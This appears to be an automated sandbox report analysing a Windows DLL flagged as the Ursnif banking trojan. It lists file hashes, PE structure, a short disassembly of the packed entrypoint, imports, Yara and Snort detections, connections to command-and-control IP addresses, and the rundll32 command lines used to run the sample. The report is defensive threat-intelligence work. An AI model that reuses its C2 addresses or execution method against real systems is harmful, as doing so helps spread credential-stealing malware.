Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1519377" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE01E.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Tue May 17 17:46:27 2022, 0x1205a4 type
Category:	dropped
Size (bytes):	36570
Entropy (8bit):	1.963441699352685
Encrypted:	false
SSDEEP:	192:bGRkOtRQ8xOsjl7Ab/3hfQSsw/PFnzkVPtvgRbVub3vnyCLAF:IRQJsR7STs4PF4VPZe
MD5:	E74752610B3F2B72E9F54F2896BA84A7
SHA1:	049CE65B7342E38F1187A02DA2921BDD878CB6C4
SHA-256:	5E4978473726FAD05A527A7F2B15EEACCCFC195168C2FEEFC032DDE3A1CC5C84
SHA-512:	9F9C21C38572FCDFEB130F80E549EDB73E618B898E89C91CC8AC96CD0023A7214EA8ADC8F8A50C398C9685F77CF0956B7D3FD757A34EED8F7ACBFD7E2A50B20B
Malicious:	false
Preview:	MDMP....... .......s.b........................L...........$................!..........`.......8...........T...........(....~...........................................................................................U...........B..............GenuineIntelW...........T...........k.b.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE33B.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8330
Entropy (8bit):	3.6969773053771005
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNifK6Nn6YogSUqfgmftSuCpr789bC0qsf0iIWm:RrlsNiS6Nn6YvSUqfgmftSKC0Jf3w
MD5:	5E1BDBE4B0EAC420C3E6A261F1F0728B
SHA1:	84D6A1AC2998D48BDCE5F2A83038660BDB4B5E93
SHA-256:	CC786E33785A7F37D9AF82F267A0619A689A508B45D7C848F6C3FD83F39F3FD5
SHA-512:	FDB19045DA7F28F63F00E96136FD9B8447988936E096507CFA1513AEB6C655A0CEBA38037E5720F3F885669D47397781526584843690CB0470DE3E6527076801
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.1.6.4.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE465.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4598
Entropy (8bit):	4.470238995950005
Encrypted:	false
SSDEEP:	48:cvIwSD8zslJgtWI9rrWgc8sqYjT8fm8M4J2+uZFPk+q849LdKcQIcQw0ed:uITf/AagrsqYMJ0QtdKkw0ed
MD5:	A30EFF1254FF492B1692F5A8E28DB0AA
SHA1:	A8078340FAF23A434C5809174497EB20913EEC08
SHA-256:	E3C2A06ADD5AD26ABF77097FB779006893811115D5FB4BD394525DD88472C681
SHA-512:	FF42202BD8AF8CDAFE8A75F7A0432E1571823B7EECE26026CC40919DFDDAEF9069910B328EC6AC19BBE1E1001EA4A71D52CB2A716C58673D49BD30F888236A3F
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1519377" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF4BF.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Tue May 17 17:46:32 2022, 0x1205a4 type
Category:	dropped
Size (bytes):	49574
Entropy (8bit):	2.210710362054232
Encrypted:	false
SSDEEP:	192:qh8dkOtRO4+ROs3fpihK13usiXGN0PgQoDmwcZeQsgBxZG58e9tFaiQSsw/PFnA/:qwROisPpKGWbHZs8QjhTs4PFR4ZToxDW
MD5:	02568CFCB4AC03D9A318D9A1CBC32E0D
SHA1:	F1550A2D7DED2097431C376C941D6F6E216B3E0B
SHA-256:	DC064A2A66541B291785C2764DD5F565A81C10AD15E42628BE709CCE66389991
SHA-512:	F3E1D73ABB7B2C4D346FC2A25C955C897384D6321BBD1E0B77409396849BE9A07B2AF765D7236D4616A8F2482E0771FBFF894BDA9504C1DC319BDD4B71675CE2
Malicious:	false
Preview:	MDMP....... .......x.b........................L...........$................!..........`.......8...........T............................................................................................................U...........B..............GenuineIntelW...........T...........k.b.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF740.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8294
Entropy (8bit):	3.68940098362101
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNifS64m96YomSU9IvAMgmfZSLCpDs89b+0qsfvqm:RrlsNiq6H96YpSU9IrgmfZSa+0Jfz
MD5:	B4AD9CEAFFF84C71EBC7925850F647C1
SHA1:	6B103115887DAA90C9CA3190D176E6C8F49863B7
SHA-256:	DE5F73668A888362ECF48DF4E6F750BCCE84D98E29E387AA58FB881B46E41D4E
SHA-512:	F0972F4561152F0E5F4AC4CAEB66A0E2BA3C4293BA8FF090912BB99A74EB01570FAC37F934A294DB2F2FC5BD5467DFDCC8612D03490BC751B4EC69AE1A8F4F26
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.1.6.4.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF8A9.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4564
Entropy (8bit):	4.428812019736952
Encrypted:	false
SSDEEP:	48:cvIwSD8zslJgtWI9rrWgc8sqYjD8fm8M4J2+EXFrb+q84Pv/KcQIcQw0ed:uITf/AagrsqYkJGJL/Kkw0ed
MD5:	4ABF390CC55B28E9EB8BDB1880978763
SHA1:	3B8DFD5E6EFEB533F1834EA412851E91BA8DF6C2
SHA-256:	4CBB835351594FA5467D3F2173084A80F75A975554B4BF0C3FF6EC65BE3C0978
SHA-512:	A657E7317CB9BBDF037A53C5E80C9C42052BC30C62212879C025676844CCCD066BE79065B6F348A195D5B469A6B9B7921FDF3E41BCB770E9D50F32DE92A2C181
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1519377" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

Static File Info

General

File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.254256478645708
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	62835e34e60c1.dll
File size:	442368
MD5:	5572213d17be7de71f36fa68eb6808a8
SHA1:	5e8b27d57f6c9dc02cf2e30d47f8ed439f0fa20e
SHA256:	f58f9c8e6a62223efa263da10850e188004471cb2be65264b7f91f27ebab0766
SHA512:	f015eb3c633c916227b19dc1e446d189ce8ebbb82cadf1c71d962e9d67d8d43defef437f0cb41974173e14c8fdc65808c74e4baacc723ecf0d4c87078566334d
SSDEEP:	6144:oE1iktxgcV9yjYJrTOkRLookGIw8OaDSOKdPmo6iJTk/DmpFkbakc+abuFGGGGGD:oE44xgcV9yjY1OkEGx/V72/DmSH6/
TLSH:	3894E00965216A6EC9DC273DC9E5D31B1DA2B75CD23E70BE3CF43C9F7AE5125820428A
File Content Preview:	MZ......................@...........................................................(.......0...w+!.W....]v...............4.....Y^........7.......x.........<.............A.............., ......,%.......{.......7.o.......O.....4.......5.......@.....Rich...

File Icon


Icon Hash:	9068eccc64f6e2ad

Static PE Info

General

Entrypoint:	0x4014d0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x3EC34607 [Thu May 15 07:47:19 2003 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	a2b7486f7219709bc441af397fbc35ab

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add ecx, FFFFFFFFh
call 00007F7390BECE6Ah
pop eax
pop eax
mov dword ptr [0041461Ch], eax
mov edx, dword ptr [00414738h]
sub edx, 00005289h
call edx
mov eax, ebx
mov dword ptr [00414618h], eax
mov eax, esi
mov dword ptr [00414610h], eax
mov dword ptr [00414620h], ebp
mov dword ptr [00414614h], edi
add dword ptr [00414620h], 00000004h
loop 00007F7390BECE17h
mov dword ptr [ebp+00h], eax
nop
nop
nop
push esp
push D72C767Ah
jbe 00007F7390BECEBFh
xlatb
rcl dword ptr [edi+2E46AAC6h], cl
jle 00007F7390BECE96h
in al, dx
mov eax, A897C0E8h
pushfd
xor al, D1h
push esi
shl dword ptr [edx+7D8B0393h], 4Fh
int3
pop ss
mov dh, 0Eh
push es
sub dword ptr [esi-0Ah], esp
xchg dword ptr [esp+edi*2], ebp
xor esi, dword ptr [esi]
mov eax, 7DE0500Fh
dec ebp
sar eax, FFFFFFDEh
mov byte ptr [379552ECh], al
std
test al, E7h
sub al, A4h
scasb
add ebx, dword ptr [edx]
pop es
xchg eax, ebx
dec edi
int B4h
cmpsd
int 35h
mov dh, BDh
mov byte ptr [ebp-1BA85C92h], dl
mov es, word ptr [esi+34867DB0h]
out dx, al
push ecx
mov ebx, 7D4347D0h
and al, B0h
jbe 00007F7390BECDE7h
sti
push ds
push cs
fpatan
clc
jl 00007F7390BECEB0h
xor ebp, dword ptr [edi]
cmc
fstsw word ptr [esp+ebx*2-12A5E66Ah]
jp 00007F7390BECE37h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xdd7c	0x8c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x62000	0x9f28	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x6c000	0xf40	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xd000	0xb8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xb8a0	0xc000	False	0.0812784830729	data	1.12155002117	IMAGE_SCN_TYPE_NO_PAD, IMAGE_SCN_MEM_FARDATA, IMAGE_SCN_TYPE_GROUP, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_PROTECTED, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_LNK_OVER, IMAGE_SCN_TYPE_COPY, IMAGE_SCN_CNT_CODE, IMAGE_SCN_LNK_COMDAT, IMAGE_SCN_GPREL, IMAGE_SCN_NO_DEFER_SPEC_EXC, IMAGE_SCN_MEM_READ
.rdata	0xd000	0x121f	0x2000	False	0.187133789062	data	4.12151309824	IMAGE_SCN_TYPE_NOLOAD, IMAGE_SCN_TYPE_DSECT, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_LNK_OTHER, IMAGE_SCN_LNK_INFO, IMAGE_SCN_TYPE_COPY, IMAGE_SCN_MEM_READ
.data	0xf000	0x7ac0	0x6000	False	0.37646484375	data	6.00984449077	IMAGE_SCN_TYPE_DSECT, IMAGE_SCN_TYPE_NO_PAD, IMAGE_SCN_MEM_FARDATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_PROTECTED, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_TYPE_COPY, IMAGE_SCN_CNT_CODE, IMAGE_SCN_GPREL, IMAGE_SCN_NO_DEFER_SPEC_EXC, IMAGE_SCN_MEM_READ
.crt	0x17000	0x1dcbd	0x1e000	False	0.988419596354	data	7.98105173778	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.erloc	0x35000	0x2ca3b	0x2d000	False	0.988259548611	data	7.98162384749	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x62000	0x9f28	0xa000	False	0.602783203125	data	6.51663069246	IMAGE_SCN_LNK_REMOVE, IMAGE_SCN_TYPE_NO_PAD, IMAGE_SCN_TYPE_GROUP, IMAGE_SCN_LNK_INFO, IMAGE_SCN_MEM_PROTECTED, IMAGE_SCN_TYPE_COPY, IMAGE_SCN_CNT_CODE, IMAGE_SCN_NO_DEFER_SPEC_EXC, IMAGE_SCN_MEM_READ
.reloc	0x6c000	0x1360	0x2000	False	0.223266601562	data	3.77920644751	IMAGE_SCN_TYPE_NOLOAD, IMAGE_SCN_TYPE_NO_PAD, IMAGE_SCN_MEM_FARDATA, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_LNK_OTHER, IMAGE_SCN_LNK_INFO, IMAGE_SCN_LNK_OVER, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_LNK_COMDAT, IMAGE_SCN_GPREL, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_BITMAP	0x62360	0x666	data	English	United States
RT_ICON	0x629c8	0x485d	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States
RT_ICON	0x67228	0x25a8	dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 331218944, next used block 4106092544	English	United States
RT_ICON	0x697d0	0xea8	data	English	United States
RT_ICON	0x6a678	0x8a8	dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0	English	United States
RT_ICON	0x6af20	0x568	GLS_BINARY_LSB_FIRST	English	United States
RT_DIALOG	0x6b488	0xb4	data	English	United States
RT_DIALOG	0x6b540	0x120	data	English	United States
RT_DIALOG	0x6b660	0x158	data	English	United States
RT_DIALOG	0x6b7b8	0x202	data	English	United States
RT_DIALOG	0x6b9c0	0xf8	data	English	United States
RT_DIALOG	0x6bab8	0xa0	data	English	United States
RT_DIALOG	0x6bb58	0xee	data	English	United States
RT_GROUP_ICON	0x6bc48	0x4c	data	English	United States
RT_VERSION	0x6bc98	0x290	MS Windows COFF PA-RISC object file	English	United States

Imports

DLL	Import
USER32.dll	IsWindow, LockWorkStation, ExitWindowsEx, LoadCursorFromFileA, IsWindowEnabled, GetMessagePos, GetClassNameA, GetClientRect, GetUpdateRgn, GetWindowWord
KERNEL32.dll	GlobalFree, GetCommState, LockFile, EnumResourceTypesA, GetProcAddress, GetVolumePathNamesForVolumeNameW, GetShortPathNameW, GlobalMemoryStatus, WriteProcessMemory, GlobalFlags, GetFileTime, GetThreadLocale, LocalHandle, GetBinaryTypeA, GetModuleFileNameA
OLEAUT32.dll	LoadTypeLibEx
msvcrt.dll	strcoll, strftime, strtod, strncmp, fgetwc
GDI32.dll	GetCharWidthFloatA, GetTextMetricsW, GdiFlush, ExtEscape
ADVAPI32.dll	RegGetValueA, EnumServicesStatusExW, FreeEncryptionCertificateHashList, GetUserNameW, GetSidSubAuthorityCount

Version Infos

Description	Data
LegalCopyright	A Company. All rights reserved.
InternalName
FileVersion	1.0.0.0
CompanyName	A Company
ProductName
ProductVersion	1.0.0.0
FileDescription
OriginalFilename	myfile.exe
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.513.107.43.1649772802033203 05/17/22-10:46:47.467879	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49772	80	192.168.2.5	13.107.43.16

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 17, 2022 10:47:07.655096054 CEST	49784	80	192.168.2.5	185.189.151.28
May 17, 2022 10:47:10.664288998 CEST	49784	80	192.168.2.5	185.189.151.28
May 17, 2022 10:47:16.765568018 CEST	49784	80	192.168.2.5	185.189.151.28
May 17, 2022 10:48:49.267137051 CEST	49878	80	192.168.2.5	185.189.151.70
May 17, 2022 10:48:52.280919075 CEST	49878	80	192.168.2.5	185.189.151.70
May 17, 2022 10:48:58.281450033 CEST	49878	80	192.168.2.5	185.189.151.70

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
May 17, 2022 10:46:47.370256901 CEST	8.8.8.8	192.168.2.5	0xddb8	No error (0)	l-0007.l-dc-msedge.net		13.107.43.16	A (IP address)	IN (0x0001)

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exePID: 6164, Parent PID: 3600

General

Target ID:	0
Start time:	10:46:19
Start date:	17/05/2022
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe "C:\Users\user\Desktop\62835e34e60c1.dll"
Imagebase:	0xb80000
File size:	116736 bytes
MD5 hash:	7DEB5DB86C0AC789123DEC286286B938
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 6168, Parent PID: 6164

General

Target ID:	1
Start time:	10:46:20
Start date:	17/05/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\62835e34e60c1.dll",#1
Imagebase:	0x1100000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 5644, Parent PID: 6168

General

Target ID:	3
Start time:	10:46:20
Start date:	17/05/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\62835e34e60c1.dll",#1
Imagebase:	0x3a0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.484657934.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000002.952141465.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.484722678.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.484767024.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.484830136.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.484908156.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.484856150.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.484800968.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000002.952020427.0000000004839000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.484551463.0000000004E68000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: WerFault.exePID: 6400, Parent PID: 6164

General

Target ID:	4
Start time:	10:46:22
Start date:	17/05/2022
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6164 -s 400
Imagebase:	0x9b0000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: WerFault.exePID: 6260, Parent PID: 6164

General

Target ID:	6
Start time:	10:46:26
Start date:	17/05/2022
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6164 -s 408
Imagebase:	0x9b0000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: WerFault.exePID: 6516, Parent PID: 6164

General

Target ID:	9
Start time:	10:46:31
Start date:	17/05/2022
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6164 -s 412
Imagebase:	0x9b0000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: loaddll32.exePID: 6164, Parent PID: 3600COMMON

Execution Graph

Execution Coverage:	6.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	7
Total number of Limit Nodes:	0

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00401340 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 79
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetBinaryTypeA.KERNEL32 ref: 004013F9

Strings

T, xrefs: 00401490
E, xrefs: 00401420
., xrefs: 00401452

Memory Dump Source

Source File: 00000000.00000002.462725096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.462711009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
